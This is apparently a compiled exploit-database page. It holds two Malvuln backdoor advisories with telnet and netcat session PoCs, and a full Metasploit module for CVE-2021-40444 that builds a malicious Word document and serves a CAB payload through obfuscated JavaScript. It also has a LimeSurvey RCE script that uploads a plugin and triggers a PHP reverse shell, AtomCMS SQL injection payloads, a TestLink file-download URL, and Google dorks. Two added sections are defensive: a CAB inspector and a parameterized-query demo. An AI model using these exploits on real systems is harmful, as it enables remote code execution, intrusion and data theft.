<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/434923afc32a7bc7355ed9a5224b9273.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Freddy.2001<br />Vulnerability: Authentication Bypass Command Execution<br />Description: The malware listens on TCP port 19535. Third-party intruders who can reach an infected host can gain access using an empty password and run commands made available by the backdoor using TELNET.<br />Type: PE32<br />MD5: 434923afc32a7bc7355ed9a5224b9273<br />Vuln ID: MVID-2022-0486<br />Dropped files: sycon2.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />#Note: use TELNET<br /><br />telnet.exe x.x.x.x 19535<br /><br />Enter password:<br /><br />User: Victim <br />Computer net name: DESKTOP-2C3JQHO<br />IP address: 192.168.18.129<br />Local date & time: 2/3/2022 2:45:46 AM<br />Hackers connected: 2<br />$y(0n v.2.3.2 by Meerkat Systems | NLG<br />Sycon><br />Sycon> windows <br />Window 6976: dump <br />Window 6976: tmp <br />Window 1956: Administrator: Administrator Command Prompt <br />Window 6976: Program Manager <br />Sycon> cd \ <br />CD: C:\ <br />Sycon> dir <br />Found: $Recycle.Bin <br />Found: Boot <br />Found: bootmgr <br />Found: BOOTNXT <br />etc...<br />Sycon> exec calc <br />Executing... <br />Sycon> logoff <br />Windows is going down... <br />I'm killed! <br />Sycon><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::Remote::HttpServer::HTML<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',<br /> 'Description' => %q{<br /> This module creates a malicious docx file that when opened in Word on a vulnerable Windows<br /> system will lead to code execution. This vulnerability exists because an attacker can<br /> craft a malicious ActiveX control to be used by a Microsoft Office document that hosts<br /> the browser rendering engine.<br /> },<br /> 'References' => [<br /> ['CVE', '2021-40444'],<br /> ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],<br /> ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],<br /> ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],<br /> ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],<br /> ['URL', 'https://github.com/klezVirus/CVE-2021-40444']<br /> ],<br /> 'Author' => [<br /> 'lockedbyte ', # Vulnerability discovery.<br /> 'klezVirus ', # References and PoC.<br /> 'thesunRider', # Official Metasploit module.<br /> 'mekhalleh (RAMELLA Sébastien)' # Zeop-CyberSecurity - code base contribution and refactoring.<br /> ],<br /> 'DisclosureDate' => '2021-09-23',<br /> 'License' => MSF_LICENSE,<br /> 'Privileged' => false,<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X64],<br /> 'Payload' => {<br /> 'DisableNops' => true<br /> },<br /> 'DefaultOptions' => {<br /> 'FILENAME' => 'msf.docx'<br /> },<br /> 'Targets' => [<br /> [<br /> 'Hosted', {}<br /> 
]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [UNRELIABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])<br /> ])<br /> register_advanced_options([<br /> OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),<br /> ])<br /> end<br /><br /> def bin_to_hex(bstr)<br /> return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)<br /> end<br /><br /> def cab_checksum(data, seed = "\x00\x00\x00\x00")<br /> checksum = seed<br /><br /> bytes = ''<br /> data.chars.each_slice(4).map(&:join).each do |dword|<br /> if dword.length == 4<br /> checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')<br /> else<br /> bytes = dword<br /> end<br /> end<br /> checksum = checksum.reverse<br /><br /> case (data.length % 4)<br /> when 3<br /> dword = "\x00#{bytes}"<br /> when 2<br /> dword = "\x00\x00#{bytes}"<br /> when 1<br /> dword = "\x00\x00\x00#{bytes}"<br /> else<br /> dword = "\x00\x00\x00\x00"<br /> end<br /><br /> checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse<br /> end<br /><br /> # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf<br /> def create_cab(data)<br /> cab_cfdata = ''<br /> filename = "../#{File.basename(@my_resources.first)}.inf"<br /> block_size = 32768<br /> struct_cffile = 0xd<br /> struct_cfheader = 0x30<br /><br /> block_counter = 0<br /> data.chars.each_slice(block_size).map(&:join).each do |block|<br /> block_counter += 1<br /><br /> seed = "#{[block.length].pack('S')}#{[block.length].pack('S')}"<br /> csum = cab_checksum(block, seed)<br /><br /> vprint_status("Data block added w/ checksum: #{bin_to_hex(csum)}")<br /> cab_cfdata << csum # uint32 {4} - 
Checksum<br /> cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length<br /> cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length<br /> cab_cfdata << block<br /> end<br /><br /> cab_size = [<br /> struct_cfheader +<br /> struct_cffile +<br /> filename.length +<br /> cab_cfdata.length<br /> ].pack('L<')<br /><br /> # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)<br /> cab_header = "\x4D\x53\x43\x46" # uint32 {4} - Header (MSCF)<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /> cab_header << cab_size # uint32 {4} - Archive Length<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /><br /> cab_header << "\x2C\x00\x00\x00" # uint32 {4} - Offset to the first CFFILE<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Reserved (null)<br /> cab_header << "\x03" # byte {1} - Minor Version (3)<br /> cab_header << "\x01" # byte {1} - Major Version (1)<br /> cab_header << "\x01\x00" # uint16 {2} - Number of Folders<br /> cab_header << "\x01\x00" # uint16 {2} - Number of Files<br /> cab_header << "\x00\x00" # uint16 {2} - Flags<br /><br /> cab_header << "\xD2\x04" # uint16 {2} - Cabinet Set ID Number<br /> cab_header << "\x00\x00" # uint16 {2} - Sequential Number of this Cabinet file in a Set<br /><br /> # CFFOLDER<br /> cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder<br /> struct_cfheader +<br /> struct_cffile +<br /> filename.length<br /> ].pack('L<')<br /> cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder<br /> cab_header << "\x00\x00" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)<br /><br /> # increase file size to trigger vulnerability<br /> cab_header << [ # uint32 {4} - Uncompressed File Length ("\x02\x00\x5C\x41")<br /> data.length + 1073741824<br /> ].pack('L<')<br /><br /> # set current date and time in the format of cab file<br /> date_time = 
Time.new<br /> date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')<br /> time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')<br /><br /> # CFFILE<br /> cab_header << "\x00\x00\x00\x00" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)<br /> cab_header << "\x00\x00" # uint16 {2} - Folder ID (starts at 0)<br /> cab_header << date # uint16 {2} - File Date (\x5A\x53)<br /> cab_header << time # uint16 {2} - File Time (\xC3\x5C)<br /> cab_header << "\x20\x00" # uint16 {2} - File Attributes<br /> cab_header << filename # byte {X} - Filename (ASCII)<br /> cab_header << "\x00" # byte {1} - null Filename Terminator<br /><br /> cab_stream = cab_header<br /><br /> # CFDATA<br /> cab_stream << cab_cfdata<br /> end<br /><br /> def generate_html<br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab"<br /> inf = "#{File.basename(@my_resources.first)}.inf"<br /><br /> file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')<br /> js_content = ::File.binread(file_path)<br /><br /> js_content.gsub!('REPLACE_INF', inf)<br /> js_content.gsub!('REPLACE_URI', uri)<br /> if datastore['OBFUSCATE']<br /> print_status('Obfuscate JavaScript content')<br /><br /> js_content = Rex::Exploitation::JSObfu.new js_content<br /> js_content = js_content.obfuscate(memory_sensitive: false)<br /> end<br /><br /> html = '<!DOCTYPE html><html><head><meta http-equiv="Expires" content="-1"><meta http-equiv="X-UA-Compatible" content="IE=11"></head><body><script>'<br /> html += js_content.to_s<br /> html += '</script></body></html>'<br /> html<br /> end<br /><br /> def get_file_in_docx(fname)<br /> i = @docx.find_index { |item| item[:fname] == fname }<br /><br /> unless i<br /> fail_with(Failure::NotFound, "This template 
cannot be used because it is missing: #{fname}")<br /> end<br /><br /> @docx.fetch(i)[:data]<br /> end<br /><br /> def get_template_path<br /> datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')<br /> end<br /><br /> def inject_docx<br /> document_xml = get_file_in_docx('word/document.xml')<br /> unless document_xml<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')<br /> end<br /><br /> document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')<br /> unless document_xml_rels<br /> fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')<br /> end<br /><br /> uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"<br /> @docx.each do |entry|<br /> case entry[:fname]<br /> when 'word/document.xml'<br /> entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)<br /> when 'word/_rels/document.xml.rels'<br /> entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', "mhtml:#{uri}!x-usc:#{uri}")<br /> end<br /> end<br /> end<br /><br /> def normalize_uri(*strs)<br /> new_str = strs * '/'<br /><br /> new_str = new_str.gsub!('//', '/') while new_str.index('//')<br /><br /> # makes sure there's a starting slash<br /> unless new_str[0, 1] == '/'<br /> new_str = '/' + new_str<br /> end<br /><br /> new_str<br /> end<br /><br /> def on_request_uri(cli, request)<br /> header_cab = {<br /> 'Access-Control-Allow-Origin' => '*',<br /> 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',<br /> 'Cache-Control' => 'no-store, no-cache, must-revalidate',<br /> 'Content-Type' => 'application/octet-stream',<br /> 'Content-Disposition' => "attachment; filename=#{File.basename(@my_resources.first)}.cab"<br /> }<br /><br /> header_html = {<br /> 'Access-Control-Allow-Origin' => '*',<br /> 'Access-Control-Allow-Methods' => 'GET, 
POST',<br /> 'Cache-Control' => 'no-store, no-cache, must-revalidate',<br /> 'Content-Type' => 'text/html; charset=UTF-8'<br /> }<br /><br /> if request.method.eql? 'HEAD'<br /> if request.raw_uri.to_s.end_with? '.cab'<br /> send_response(cli, '', header_cab)<br /> else<br /> send_response(cli, '', header_html)<br /> end<br /> elsif request.method.eql? 'OPTIONS'<br /> response = create_response(501, 'Unsupported Method')<br /> response['Content-Type'] = 'text/html'<br /> response.body = ''<br /><br /> cli.send_response(response)<br /> elsif request.raw_uri.to_s.end_with? '.html'<br /> print_status('Sending HTML Payload')<br /><br /> send_response_html(cli, generate_html, header_html)<br /> elsif request.raw_uri.to_s.end_with? '.cab'<br /> print_status('Sending CAB Payload')<br /><br /> send_response(cli, create_cab(@dll_payload), header_cab)<br /> end<br /> end<br /><br /> def pack_docx<br /> @docx.each do |entry|<br /> if entry[:data].is_a?(Nokogiri::XML::Document)<br /> entry[:data] = entry[:data].to_s<br /> end<br /> end<br /><br /> Msf::Util::EXE.to_zip(@docx)<br /> end<br /><br /> def unpack_docx(template_path)<br /> document = []<br /><br /> Zip::File.open(template_path) do |entries|<br /> entries.each do |entry|<br /> if entry.name.match(/\.xml|\.rels$/i)<br /> content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?<br /> elsif entry.file?<br /> content = entry.get_input_stream.read<br /> end<br /><br /> vprint_status("Parsing item from template: #{entry.name}")<br /><br /> document << { fname: entry.name, data: content }<br /> end<br /> end<br /><br /> document<br /> end<br /><br /> def primer<br /> print_status('CVE-2021-40444: Generate a malicious docx file')<br /><br /> @proto = (datastore['SSL'] ? 
'https' : 'http')<br /> if datastore['SRVHOST'] == '0.0.0.0'<br /> datastore['SRVHOST'] = Rex::Socket.source_address<br /> end<br /><br /> template_path = get_template_path<br /> unless File.extname(template_path).match(/\.docx$/i)<br /> fail_with(Failure::BadConfig, 'Template is not a docx file!')<br /> end<br /><br /> print_status("Using template '#{template_path}'")<br /> @docx = unpack_docx(template_path)<br /><br /> print_status('Injecting payload in docx document')<br /> inject_docx<br /><br /> print_status("Finalizing docx '#{datastore['FILENAME']}'")<br /> file_create(pack_docx)<br /><br /> @dll_payload = Msf::Util::EXE.to_win64pe_dll(<br /> framework,<br /> payload.encoded,<br /> {<br /> arch: payload.arch.first,<br /> mixed_mode: true,<br /> platform: 'win'<br /> }<br /> )<br /> end<br />end<br /></code></pre>
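<p>The module above hand-builds a cabinet whose CFFILE name starts with "../" and whose declared uncompressed length is inflated by 1 GiB. The following is an added example, not part of the Metasploit module: it looks at such a cabinet from the defender's side, implementing the CSUMCompute checksum from the MS-CAB specification the module links, walking CFHEADER, CFFOLDER, CFFILE and the CFDATA blocks, and reporting the file name, declared versus present uncompressed size, and checksum failures. <code>build_cab</code> is a constructed helper that only produces sample input in the module's layout (one folder, one stored file); a real triage feeds captured files, and cabinets with reserved areas or several files are outside the scope of this example.</p>

```python
import struct
from typing import Any, Dict, List, Optional

CFHEADER_LEN, CFFOLDER_LEN = 36, 8


def cab_checksum(data: bytes, seed: int = 0) -> int:
    """CSUMCompute from the MS-CAB spec: XOR of the little-endian 32-bit words of
    `data`; a short trailing word is folded in as b0<<16|b1<<8|b2, b0<<8|b1 or b0."""
    csum = seed
    whole = len(data) // 4
    for i in range(whole):
        csum ^= struct.unpack_from('<I', data, i * 4)[0]
    ul = 0
    for b in data[whole * 4:]:          # leftover bytes, folded big-endian style
        ul = (ul << 8) | b
    return csum ^ ul


def cfdata_checksum(cb_data: int, cb_uncomp: int, payload: bytes) -> int:
    """Value stored in CFDATA.csum: the data bytes, then the two length fields
    with that result as seed (XOR, so the order the module uses is equivalent)."""
    return cab_checksum(struct.pack('<HH', cb_data, cb_uncomp), cab_checksum(payload))


def build_cab(filename: bytes, payload: bytes, cb_file: Optional[int] = None,
              block_size: int = 32768) -> bytes:
    """Constructed helper: one folder, one stored (uncompressed) file, the same
    structure the module emits. `cb_file` overrides the declared file length."""
    blocks = [payload[i:i + block_size] for i in range(0, len(payload), block_size)]
    cfdata = b''.join(struct.pack('<IHH', cfdata_checksum(len(b), len(b), b), len(b), len(b)) + b
                      for b in blocks)
    declared = len(payload) if cb_file is None else cb_file
    cffile = struct.pack('<IIHHHH', declared, 0, 0, 0x5A53, 0x5CC3, 0x20) + filename + b'\x00'
    coff_cfdata = CFHEADER_LEN + CFFOLDER_LEN + len(cffile)
    cffolder = struct.pack('<IHH', coff_cfdata, len(blocks), 0)       # typeCompress 0 = stored
    cfheader = struct.pack('<4sIIIIIBBHHHHH', b'MSCF', 0, coff_cfdata + len(cfdata), 0,
                           CFHEADER_LEN + CFFOLDER_LEN, 0, 3, 1, 1, 1, 0, 0x04D2, 0)
    return cfheader + cffolder + cffile + cfdata


def inspect_cab(blob: bytes) -> Dict[str, Any]:
    """Walk a single-folder, single-file cabinet and report traits worth alerting on."""
    if blob[:4] != b'MSCF':
        raise ValueError('not a cabinet')
    cb_cabinet, _r2, coff_files, _r3, _minor, _major, _nfold, _nfiles, flags = \
        struct.unpack_from('<IIIIBBHHH', blob, 8)
    if flags & 0x4:
        raise ValueError('cabinets with reserved areas are outside this example')
    coff_cabstart, n_cfdata, _compress = struct.unpack_from('<IHH', blob, CFHEADER_LEN)
    cb_file = struct.unpack_from('<I', blob, coff_files)[0]
    name_start = coff_files + 16                         # after the six fixed CFFILE fields
    name = blob[name_start:blob.index(b'\x00', name_start)].decode('latin-1')

    pos, in_blocks, bad = coff_cabstart, 0, 0
    for _ in range(n_cfdata):
        csum, cb_data, cb_uncomp = struct.unpack_from('<IHH', blob, pos)
        if cfdata_checksum(cb_data, cb_uncomp, blob[pos + 8:pos + 8 + cb_data]) != csum:
            bad += 1
        in_blocks += cb_uncomp
        pos += 8 + cb_data

    findings: List[str] = []
    if '..' in name.replace('\\', '/').split('/'):
        findings.append('file name escapes the extraction directory: %r' % name)
    if cb_file > in_blocks:
        findings.append('declared cbFile %d exceeds %d bytes present in CFDATA' % (cb_file, in_blocks))
    if cb_cabinet != len(blob):
        findings.append('cbCabinet %d does not match actual size %d' % (cb_cabinet, len(blob)))
    if bad:
        findings.append('%d CFDATA block(s) fail the checksum' % bad)
    return {'name': name, 'cb_file': cb_file, 'in_blocks': in_blocks,
            'blocks': n_cfdata, 'bad_checksums': bad, 'findings': findings}
```

<p>Either of the first two findings on its own is enough to quarantine a cabinet fetched by an Office process; the checksum pass is there because a tampered or truncated sample should be reported as such rather than parsed as if it were intact.</p>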
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/29bc048d58ab8038c7001ef0d5e69c9b.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Prexot.a<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on random high TCP ports, e.g. 11404, 19545, 17001, 10110. Third-party attackers who can reach an infected system can log on using any username/password combination.<br />Type: PE32<br />MD5: 29bc048d58ab8038c7001ef0d5e69c9b<br />Vuln ID: MVID-2022-0484<br />Dropped files: services.exe, mstempf.exe<br />Disclosure: 02/08/2022<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 10110<br />220 Bot Server (Win32)<br />USER malvuln<br />331 Password required.<br />PASS hate<br />230 Login successful. Have fun.<br />SYST<br />215 UNIX Type: L8<br />1PASV<br />227 Entering Passive Mode<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login<br /># Date: 05/12/2021<br /># Exploit Author: Y1LD1R1M<br /># Vendor Homepage: https://www.limesurvey.org/<br /># Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip<br /># Version: 5.2.x<br /># Tested on: Kali Linux 2021.3<br /># Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE<br /><br />#!/usr/bin/python<br /># -*- coding: utf-8 -*-<br /><br /><br />import requests<br />import sys<br />import warnings<br />from bs4 import BeautifulSoup<br /><br />warnings.filterwarnings("ignore", category=UserWarning, module='bs4')<br />print("_______________LimeSurvey RCE_______________")<br />print("")<br />print("")<br />print("Usage: python exploit.py URL username password port")<br />print("Example: python exploit.py http://192.26.26.128 admin password 80")<br />print("")<br />print("")<br />print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")<br />print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")<br />print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")<br />print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")<br />print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")<br />print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")<br />print("")<br />print("")<br />url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />port = sys.argv[4]<br /><br />req = requests.session()<br />print("[+] Retrieving CSRF token...")<br />loginPage = req.get(url+"/index.php/admin/authentication/sa/login")<br />response = loginPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token = s.findAll('input')[0].get("value")<br />print(CSRF_token)<br />print("[+] Sending Login Request...")<br /><br />login_creds = {<br /> "user": username,<br /> "password": password,<br /> 
"authMethod": "Authdb",<br /> "loginlang":"default",<br /> "action":"login",<br /> "width":"1581",<br /> "login_submit": "login",<br /> "YII_CSRF_TOKEN": CSRF_token<br />}<br />print("[+]Login Successful")<br />print("")<br />print("[+] Upload Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br />filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS<br />login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)<br />UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")<br />response = UploadPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token2 = s.findAll('input')[0].get("value")<br />print(CSRF_token2)<br />Upload_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token2,<br /> "lid":"$lid",<br /> "action": "templateupload"<br />}<br />file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)<br />UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")<br />response = UploadPage.text<br />print("[+] Plugin Uploaded Successfully")<br />print("")<br />print("[+] Install Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br /><br />InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")<br />response = InstallPage.text<br />s = BeautifulSoup(response, 'html.parser')<br />CSRF_token3 = s.findAll('input')[0].get("value")<br />print(CSRF_token3)<br />Install_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token3,<br /> "isUpdate": "false"<br />}<br />file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)<br />print("[+] Plugin Installed Successfully")<br />print("")<br />print("[+] Activate Plugin Request...")<br />print("[+] Retrieving CSRF token...")<br />ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")<br />response = ActivatePage.text<br />s = BeautifulSoup(response, 'html.parser')<br 
/>CSRF_token4 = s.findAll('input')[0].get("value")<br />print(CSRF_token4)<br />Activate_creds = {<br /> "YII_CSRF_TOKEN":CSRF_token4,<br /> "pluginId": "1" # CHANGE THIS<br />}<br />file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds) <br />print("[+] Plugin Activated Successfully")<br />print("")<br />print("[+] Reverse Shell Starting, Check Your Connection :)")<br />shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS<br /> <br /></code></pre>
<pre><code># Exploit Title: AtomCMS v2.0 - SQLi<br /># Date: 08/02/2022<br /># Exploit Author: Luca Cuzzolin aka czz78<br /># Vendor Homepage: https://github.com/thedigicraft/Atom.CMS<br /># Version: v2.0<br /># Category: Webapps<br /># Tested on: Debian linux<br /># CVE : CVE-2022-24223<br /><br /><br />====================================================<br /><br /># PoC : SQLi :<br /><br />http://127.0.0.1/Atom.CMS/admin/login.php<br /><br /><br />POST /Atom.CMS/admin/login.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101<br />Firefox/91.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: it,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 35<br />Origin: http://127.0.0.1<br />Connection: keep-alive<br />Referer: http://127.0.0.1/Atom.CMS/admin/login.php<br />Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />email=test%40test.com&password=1234<br /><br /><br />Vulnerable Payload :<br /><br />Parameter: email (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=test@test.com' AND (SELECT 5613 FROM<br />(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234<br /> Vector: AND (SELECT [RANDNUM] FROM<br />(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 6 columns<br /> Payload: email=test@test.com' UNION ALL SELECT<br />NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--<br />-&password=1234<br /> Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -<br 
/>---<br /><br /><br /><br />====================================================<br /><br /></code></pre>
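<p>The advisory gives the injection points and sqlmap's payloads but not the application code behind them. The following is an added example, not AtomCMS code: a minimal login lookup written the vulnerable way (the email value concatenated into the SQL text) next to the parameterized form, run against an in-memory SQLite table with the six-column shape the UNION payload above relies on. SQLite has neither SLEEP nor CONCAT, so the time-based variant is not reproduced and the CONCAT(...) term in the advisory's payload is replaced by a literal marker string; table and column names are assumptions.</p>

```python
import sqlite3
from typing import Optional, Tuple

# Constructed schema with six columns, matching the "6 columns" UNION vector above.
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT,
                    name TEXT, role TEXT, created TEXT);
INSERT INTO users VALUES (1, 'admin@example.com', 'hashed-secret',
                          'Admin', 'admin', '2022-02-08');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(':memory:')
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> Optional[Tuple]:
    # The request values become part of the SQL grammar: this is the defect
    # behind both the time-based and the UNION findings in the advisory.
    sql = f"SELECT * FROM users WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, email: str, password: str) -> Optional[Tuple]:
    # Bound parameters: the driver passes the values to the engine separately
    # from the statement text, so quotes and comment markers have no meaning.
    sql = "SELECT * FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()


# The advisory's UNION payload with CONCAT(0x..,0x..,0x..) replaced by a marker
# literal; "-- -" comments out the rest of the statement, password check included.
UNION_EMAIL = "test@test.com' UNION ALL SELECT NULL,'qzvzq-marker-qbzxq',NULL,NULL,NULL,NULL-- -"


def demo() -> dict:
    conn = make_db()
    return {
        'vulnerable': login_vulnerable(conn, UNION_EMAIL, '1234'),  # fabricated row
        'safe': login_safe(conn, UNION_EMAIL, '1234'),              # no such email
        'legit': login_safe(conn, 'admin@example.com', 'hashed-secret'),
    }
```

<p>The vulnerable path returns a row the table never contained, which is exactly what lets sqlmap confirm the column count and read data through the second column; the parameterized path returns nothing for the same input and still works for a real account.</p>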
<pre><code># Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated)<br /># Google Dork: inurl:/testlink/<br /># Date: 07/12/2021<br /># Exploit Author: Gonzalo Villegas (Cl34r)<br /># Exploit Author Homepage: https://nch.ninja<br /># Vendor Homepage: https://testlink.org/<br /># Version: 1.16 <= 1.19<br /># CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N<br /><br />You can download files from "/lib/attachments/attachmentdownload.php" by passing the id of a file listed in the database directly in the URL; otherwise you can iterate the id parameter (starting from 1).<br /><br />Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1"<br /><br />For research notes:<br />https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/<br /><br /></code></pre>
